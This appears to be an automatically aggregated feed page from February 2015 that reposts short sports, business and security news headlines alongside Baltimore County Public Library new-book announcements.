BATA, Equatorial Guinea (AP) The Confederation of African Football has fined Morocco $1 million for failing to host the 2015 African Cup of Nations and banned the country from participating in the next two tournaments in 2017 and 2019.



from FOX Sports Digital http://ift.tt/1DIdJ0v


DonorsChoose Anonymous

... trading to help our students of today become the future of our tomorrow. $ Help a classroom in support of DonorsChoose Anonymous. other amount.



from Google Alert - anonymous http://ift.tt/16zHcyM


Book Release: We should all be feminists by Adichie, Chimamanda Ngozi, 1977- author.

Book Release: Red notice : a true story of high finance, murder, and one man's fight for justice by Browder, Bill, 1964- author.

"A real-life political thriller about an American financier in the Wild East of Russia, the murder of his principled young tax attorney, and his dangerous mission to expose the Kremlin's corruption"--Amazon.com.



Source: Baltimore County Public Library - New Books


Book Release: City beasts : fourteen stories of uninvited wildlife by Kurlansky, Mark, author.

In these stories, Mark Kurlansky journeys to his familiar haunts like New York's Central Park or Miami's Little Havana but with an original, earthy, and adventurous perspective. From baseball players in the Dominican Republic to Basque separatists in Spain to a restaurant owner in Cuba, from urban coyotes to a murder of crows, Kurlansky travels the worlds of animals and their human counterparts, revealing moving and hilarious truths about our connected existence. In the end, he illuminates how c



Source: Baltimore County Public Library - New Books


Book Release: The Secret Rooms A True Story of a Haunted Castle, a Plotting Duchess, and a Family Secret by Bailey, Catherine.

For fans of Downton Abbey After the Ninth Duke of Rutland, one of the wealthiest men in Britain, died alone in a cramped room in the servants’ quarters of Belvoir Castle on April 21, 1940, his son and heir ordered the room, which contained the Rutland family archives, sealed. Sixty years later, Catherine Bailey became the first historian given access. What she discovered was a mystery: The Duke had painstakingly erased three periods of his life from all family records—but why? As Bailey uncove



Source: Baltimore County Public Library - New Books


Comcast calls customer 'Super B----' on bill

For the second time in less than a month, Comcast sends a customer a bill with an insult printed on it.



from Business and financial news - CNNMoney.com http://ift.tt/1zWEfpw


Minnesota to stop accepting TurboTax filings due to fraud




from Business and financial news - CNNMoney.com http://ift.tt/1zWEfps


Filing a false tax return comes with big penalties

Allow a tax preparer to understate your income on a 1099 or W-2 to lower your tax bill or get you a bigger refund, and you could be in big trouble if the IRS finds out.



from Business and financial news - CNNMoney.com http://ift.tt/1DI17Gv


Nice try: Goldman Sachs CEO Twitter account is a fake

Goldman Sachs said a Twitter account claiming to be owned by the most powerful man on Wall Street is a hoax.



from Business and financial news - CNNMoney.com http://ift.tt/1DI16lU


MLS Update February 06, 2015 at 06:42AM

New York City FC sign Colombian midfielder Javier Calle on loan from Independiente Medellin


New York City FC announced the signing of Colombian midfielder Javier Calle on Friday, providing coach Jason Kreis with another useful weapon as he prepares his squad for their inaugural MLS season.





from MLSsoccer.com News http://ift.tt/1EM3hsz


Player for 2nd-tier Leeds found not guilty of racism

LONDON (AP) The English Football Association has found an Italian defender for second-tier English club Leeds not guilty of a charge of racially abusing an opponent during a game.



from FOX Sports Digital http://ift.tt/18UyexG


Russia says it has finally paid national coach Capello

MOSCOW (AP) The Russian Football Union says it has cleared its debt to national coach Fabio Capello, who had been unpaid since June.



from FOX Sports Digital http://ift.tt/1xAjVmo


MLS Update February 06, 2015 at 06:00AM

Kick Off: Toronto fans welcome Sebastian Giovinco; Sacha Kljestan opens New York Red Bulls account


Here are the top 15 stories everyone's talking about this morning:


1. PRESEASON PREPARATIONS





from MLSsoccer.com News http://ift.tt/1zFTjVk


Pilot in Williams scandal: 'I am questioning my memories'

CNN on Thursday reported the story of a pilot who said he was flying the helicopter with Brian Williams on it. That pilot no longer stands by his story.



from Business and financial news - CNNMoney.com http://ift.tt/1zWxTGA


Book Release: Octonauts and the Adélie penguins.

The Octonauts are in Antarctica - the coldest place on Earth - and the Adelie penguin chicks have just hatched. While the Adelie penguin parents go hunting for food, Captain Barnacles, Kwazii and Peso are babysitting the chicks. With icebergs moving, strong storms blowing and a little penguin with a pirate heart that wants to help hunt, this is no ordinary Octonaut mission.



Source: Baltimore County Public Library - New Books


Book Release: Black lace by Michelle, Nika, author.

Continues with the tumultuous world of the Beauvois sisters and their never ending whirlwind of drama. This time the snakes are striking even harder and their bites are even more venomous. Will the sisters crumble this time, or will their money and privilege always make a way for them to come out on top?



Source: Baltimore County Public Library - New Books


Book Release: Noro lace : 30 exquisite knits

Book Release: Letting go of self-destructive behaviors : a workbook of hope and healing by Ferentz, Lisa.

"Letting Go of Self-Destructive Behaviors offers inspiring, hopeful, creative resources for the millions of male and female adolescents and adults who struggle with eating disorders, addictions, any form of self-mutilation. It is also a workbook for the clinicians who treat them. Using journaling exercises, drawing and collaging prompts, guided imagery, visualizations, and other behavioral techniques, readers will learn how to understand, compassionately work with, and heal from their behaviors



Source: Baltimore County Public Library - New Books


Stoke: Captain Ryan Shawcross ruled out of action for 'a couple of weeks' with a back injury (ESPN)

from ESPN http://m.espn.go.com/


Zenit St Petersburg: Russian Premier League referee Alexei Matyunin cleared of racially abusing striker Hulk (ESPN)

from ESPN http://m.espn.go.com/


Roma: Newly acquired forward Victor Ibarbo sidelined five weeks with a calf injury, ruling him out of up to seven games (ESPN)

from ESPN http://m.espn.go.com/


Real Madrid: Centre-back Sergio Ramos sidelined for five weeks with torn hamstring, team confirms (ESPN)

from ESPN http://m.espn.go.com/


I have a new follower on Twitter



Gefuso News

Gefuso.us enables you to in a quick way screen through several articles with a shorter content, containing the latest news in terms of business, finance, entrep



http://t.co/mUliasMKpN

Following: 7837 - Followers: 20792



February 06, 2015 at 10:50AM via Twitter http://ift.tt/1tVUGjb

MLS Update February 06, 2015 at 05:31AM

MLS Preseason Tracker: Matches, highlights, scores & news updates as they happen (February 6)


Preseason is officially underway, and we've got three games on the schedule today.





from MLSsoccer.com News http://ift.tt/1LUDe4z


MLS Update February 06, 2015 at 04:59AM

WATCH LIVE: Toronto FC Designated Player Sebastian Giovinco's introductory press conference


Sebastian Giovinco stepped off the plane at Pearson International Airport on Thursday afternoon and was immediately mobbed by Reds supporters.





from MLSsoccer.com News http://ift.tt/1IhjNn5


Book Release: The orphan sky by Leya, Ella.

"Set at the crossroads of Turkish, Persian, and Russian cultures under the red flag of Communism in the late 1970s, [this story] reveals one woman's struggle to reconcile her ideals with the corrupt world around her, and to decide whether to betray her country or her heart"--Amazon.com.



Source: Baltimore County Public Library - New Books


Book Release: Wifey's next hustle by Swinson, Kiki, author.

Kira gives up being "wifey" and heads down to South Beach, Florida to hustle and sell high-end cars at a luxury car dealership. Her clients are wealthy hedge fund investors and druggies. One druglord is her best and most lucrative customer. When it comes time to pay him back for keeping her pockets lined, she finds her debt comes at an expensive price and is forced to call in major reinforcements.



Source: Baltimore County Public Library - New Books


Book Release: Out of peel tree by Long, Laura (Professor of English)

"Moving through time and space, Out of Peel Tree unfolds the patterns of an Appalachian sensibility that reverberate everywhere: a fatalism balanced by humor and flinty, hard-won hope, an appreciation for the surprises of the everyday, and a search for love and home amid strange and familiar places and people. This innovative debut novel reveals the lives of a far-flung contemporary Appalachian family through a web of delicate turning points. A child discovers a grandmother she never knew has d



Source: Baltimore County Public Library - New Books


Book Release: Chasing gold by Hapka, Cathy, author.

Saving up money and time to visit a prestigious riding clinic, Haley pulls away from family and friends in order to pursue her dream.



Source: Baltimore County Public Library - New Books


Book Release: German cooking now : 100 recipes for family-style meals by Nolen, Jeremy.

Thursday, February 5, 2015

Hundreds of Ford workers get $19,000 raise




from Business and financial news - CNNMoney.com http://ift.tt/1EFVoF3


The money behind the vaccine medical myth

Well-funded family foundations are backing the movement to get parents to question vaccines.



from Business and financial news - CNNMoney.com http://ift.tt/16vJgIh


Now and then: Faces of North Dakota's oil boom

CNNMoney revisits 4 locals we met in 2011, living in the western North Dakota oil boom.



from Business and financial news - CNNMoney.com http://ift.tt/1LQW2Sb


WordPress Plugin Zero-Day Vulnerability Affects Thousands of Sites

A critical zero-day vulnerability has been discovered in a popular WordPress plugin, called 'FancyBox for WordPress', which is being used by hundreds of thousands of websites running on the most popular Blogging Platform WordPress.

0-DAY FLAW EXPLOITED IN THE WILD

The security researchers at network security firm Sucuri issued a warning Wednesday about the zero-day vulnerability that is





from The Hacker News http://ift.tt/1DJTBv8


10 worst hacks of all time

The worst hacks ever include computer viruses, stolen credit cards, data breaches and embarrassing leaked memos.



from Business and financial news - CNNMoney.com http://ift.tt/1zSfJo1


Book Release: Spectrum reading. Kindergarten.

Book Release: Spectrum spelling. Grade 3.

Reinforce your child's third-grade skills with Spectrum Spelling. With the progressive lessons in this workbook, your child will practice short vowels, long vowels, homophones, commonly used words, contractions, compound words, and dictionary skills. Engage your child with brainteasers, riddles, and puzzles in these full-color spelling lessons from Spectrum(R). Students in grades K-6 will find systematic instruction and practice in spelling patterns, spelling strategies, and spelling skills rela



Source: Baltimore County Public Library - New Books


Book Release: The country of Ice Cream Star by Newman, Sandra, 1965-

Book Release: Spectrum writing. Grade 4.

Book Release: Spectrum sight words : Kindergarten.

Spectrum Sight Words helps young learners master the high frequency words that commonly appear in any text with practice.



Source: Baltimore County Public Library - New Books


Book Release: Grace

Nine-year-old Grace likes having a plan but she must find a way to be flexible and open to new ideas when she goes to Paris with her mother and has trouble getting along with her cousin, while at home her friends start the business she proposed without her.



Source: Baltimore County Public Library - New Books


Book Release: The paper playhouse : awesome art projects for kids using paper, boxes, and books by Rodabaugh, Katrina.

I have a fiancé, a girlfriend and two boyfriends





from Business and financial news - CNNMoney.com http://ift.tt/1CUB2Uj


MLS Update February 05, 2015 at 07:46AM

30 Days 'Til MLS: Which teams were best at holding a lead after 30 minutes in 2014?


It is just 30 short days to MLS 2015, but to look forward, we have to look back.


We all know grabbing a lead in the first 30 minutes of a game is great, but holding onto that lead is what can separate the playoff teams from those who miss out.


In two extreme cases in 2014, it made the difference between first place and the bottom of the standings.





from MLSsoccer.com News http://ift.tt/1BXP0TG


Controversy grows over Williams' Iraq apology




from Business and financial news - CNNMoney.com http://ift.tt/1v1UjPm


Amy Pascal out as Sony Pictures co-chair

Two months after a devastating cyber-attack, Sony Pictures Entertainment co-chairman Amy Pascal is stepping down from her post, the studio announced on Thursday.



from Business and financial news - CNNMoney.com http://ift.tt/16HkXaZ


7 top stocks to buy in February




from Business and financial news - CNNMoney.com http://ift.tt/16HkZzB


Anthem hacked, Wall Street shrugs

The data breach at health insurer Anthem is scary for consumers. Yet its stock barely budged. Companies who've been hacked don't tend to get punished by investors. But cybersecurity stocks surge.



from Business and financial news - CNNMoney.com http://ift.tt/1DiyKRw


Russia + North Korea = New BFF?

Russia is looking to North Korea for business opportunities as relations with the West have soured.



from Business and financial news - CNNMoney.com http://ift.tt/1yNeked


Book Release: Leopardpox! by Landau, Orna, 1968-

When Sadie, a kindergartner, suddenly turns into a frisky leopard cub, her mother and brothers take her to a doctor, a veterinarian, and even a zoo seeking a cure.



Source: Baltimore County Public Library - New Books


Book Release: Spectrum reading. Grade 1.

Book Release: Spectrum spelling. Kindergarten.

Reinforce your kindergartner's new skills with Spectrum Spelling. With the progressive lessons in this workbook, your child will practice letter recognition, short vowels, sight words, and dictionary skills. Engage your child with brainteasers, riddles, and puzzles in these full-color spelling lessons from Spectrum(R). Students in grades K-6 will find systematic instruction and practice in spelling patterns, spelling strategies, and spelling skills related to meaning and context. Each workbook a



Source: Baltimore County Public Library - New Books


Book Release: Spectrum cursive handwriting: grades 3-5

Tales from 'walking dead' RadioShack workers

Time appears to be running out for RadioShack as employees tell stories of demise of electronics chain.



from Business and financial news - CNNMoney.com http://ift.tt/1zcq9cR


Bayern Munich centre-back Jerome Boateng handed three-match ban for Schalke red card (ESPN)

from ESPN http://ift.tt/VTgg6W


Bayern to appeal 3-match ban for defender Jerome Boateng

FRANKFURT, Germany (AP) Bayern Munich says it plans to appeal against the three-match ban imposed on defender Jerome Boateng.



from FOX Sports Digital http://ift.tt/1zcnDTL


Man City prefers Bony over Jovetic in Champions League squad

NYON, Switzerland (AP) Manchester City has made space for new signing Wilfried Bony in its Champions League squad by dropping Stevan Jovetic.



from FOX Sports Digital http://ift.tt/1zcnFuQ


MLS Update February 05, 2015 at 06:35AM

Transfer Watch: French international Hatem Ben Arfa linked with New York City FC


With the hunt still on for their third Designated Player, expansion club New York City FC were linked on Thursday morning to 27-year-old French international Hatem Ben Arfa.





from MLSsoccer.com News http://ift.tt/18Rf5Nd


MLS Update February 05, 2015 at 06:20AM

30 Days 'Til MLS: 30 things to watch for in the upcoming season


The 2015 MLS season is just 30 days away. Here are 30 things that have the staff here at MLSsoccer.com excited for things to get going.




1. EXPANDING OUR MINDS. Orlando City and New York City FC might be the most hyped pair of expansion teams in MLS history. Rightly so. Everyone's expecting big things. But on the field, will Year 1 see them go the way of the hapless 2005 Real Salt Lake side or the Cup-winning 1998 Chicago Fire?





from MLSsoccer.com News http://ift.tt/1ueN9Ms


People hate the new Keurig ... and its stock

Keurig Green Mountain disappointed investors with weak sales and guidance. The stock is well off its caffeine high. A backlash against the new 2.0 machine could be a big problem.



from Business and financial news - CNNMoney.com http://ift.tt/1Cy4HpT
